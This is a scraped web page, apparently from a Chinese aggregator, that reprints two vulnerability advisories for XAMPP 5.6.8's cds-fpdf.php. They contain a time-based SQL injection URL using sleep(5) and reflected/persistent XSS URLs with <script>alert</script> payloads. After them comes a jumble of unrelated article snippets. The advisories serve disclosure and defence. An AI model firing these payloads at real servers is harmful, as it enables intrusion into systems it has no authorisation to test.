<!--

# Exploit Title: SQL injection in XAMPP 5.6. (and previous)

# Date: --

# Exploit Author: Rafael Pedrero

# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Version: XAMPP 5.6.

# Tested on: All

# CVE : CVE--

# Category: webapps

. Description

XAMPP through 5.6. allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous).

. Proof of Concept

http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

. Solution:

The product is discontinued. Update to last version.

Reference:

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

-->

<!--

# Exploit Title: Cross Site Scripting in XAMPP 5.6. (and previous)

# Date: --

# Exploit Author: Rafael Pedrero

# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Version: XAMPP 5.6.

# Tested on: All

# CVE : CVE--

# Category: webapps

. Description

XAMPP through 5.6. allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous).

. Proof of Concept

First Request (not filter the characters's content): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

or Request: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

Second Request (to xss attack): http://X.X.X.X/xampp/cds-fpdf.php 

http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

When cds-fpdf.php is loaded not filter the characters: <b><script>alert("XSS")</script></b></td><td class=tabval>

cds.php filter it: <td class=tabval><b><script>alert("XSS&quot</script></b></td><td class=tabval>

. Solution:

The product is discontinued. Update to last version.

Reference:

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

-->

[EXP]XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting的更多相关文章

  1. 数字雨Shopex 4.8.5 SQL Injection Exp

    # -*- coding:utf-8 -* #Author:MXi4oyu #Email:798033502@qq.com #Shopex 4.8.5 SQL Injection Exp #转载请说明 ...

  2. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  3. druid sql黑名单 报异常 sql injection violation, part alway true condition not allow

    最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...

  4. PHP+MYSQL网站SQL Injection攻防

    程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报 ...

  5. SQL Injection(SQL注入漏洞)

    审计前准备: 1.安�php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ### ...

  6. HP+MYSQL网站SQL Injection攻防

    WebjxCom提示:程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程: ...

  7. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  8. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  9. How to prevent SQL injection attacks?

    In our earlier tutorial on SQL Injection, one way to have prevented the SQL injection attack was by ...

随机推荐

  1. NLTK 统计词频

    import nltk Freq_dist_nltk = nltk.FreqDist(list) for k,y in Freq_dist_nltk: print str(k),str(y)

  2. java虚拟机--->>程序计数器

    程序计数器是一块较小的内存空间,他可以看做是当前线程所执行的行号指示器.在虚拟机的概念模型(仅是概念模型,各种虚拟机可能会通过一些更高效率的方式去实现)里,字节码解释器工作室就是通过改变这个计数器的值 ...

  3. 【转】Appium 优化版

    Appium 开源分享优化版 之前分享过PageObject+Python+Appium 本版本是对上次版本较大改版,主要解决了: 失败重连一次(默认一次)可配置多次 基于appium1.7.1 ui ...

  4. HDU 6301 Distinct Values

    题目链接 http://acm.hdu.edu.cn/showproblem.php?pid=6301 多校contest1 题目大意是有一个长度为N的数组,给出M个"事实",每个 ...

  5. JavaSE基础知识(4)—数组的应用

    一.数组的特点.好处及使用步骤 1.数组的好处 特点:相当于用于保存一组元素的容器好处: 1.提高代码的简洁性和扩展性,且同时开辟多个空间,提高了效率 2.分类存储,且空间是连续的,容易查找 2.数组 ...

  6. 解决 ora-28001 密码过期的处理办法

    转载自:https://blog.csdn.net/pengyouchuan/article/details/12905623 操作步骤: $sqlplus / as sysdba ALTER PRO ...

  7. React-router4 简单总结

    官方文档读到这里,大概明白了React-router是专门为单页面设计的,,我只能说多页面格外的不方便 首先这个是基本的套路 import React from 'react' import Reac ...

  8. elk kibana查询语法

    elk日志系统中kibana查询语法 单项term查询 例: 搜 Dahlen, Malone 字段field查询 field:value 例:city:Keyport, age:26 通配符 ? 匹 ...

  9. CITROEN C8 BSI HC12 Mileage Correction with Digiprog3

    CITROEN C8 BSI HC12 odometer correction pinout to Digiprog III Digiprog 3 mileage programmer. The BS ...

  10. Vue入门---常用指令详解

    Vue入门 Vue是一个MVVM(Model / View / ViewModel)的前端框架,相对于Angular来说简单.易学上手快,近两年也也别流行,发展速度较快,已经超越Angular了.比较 ...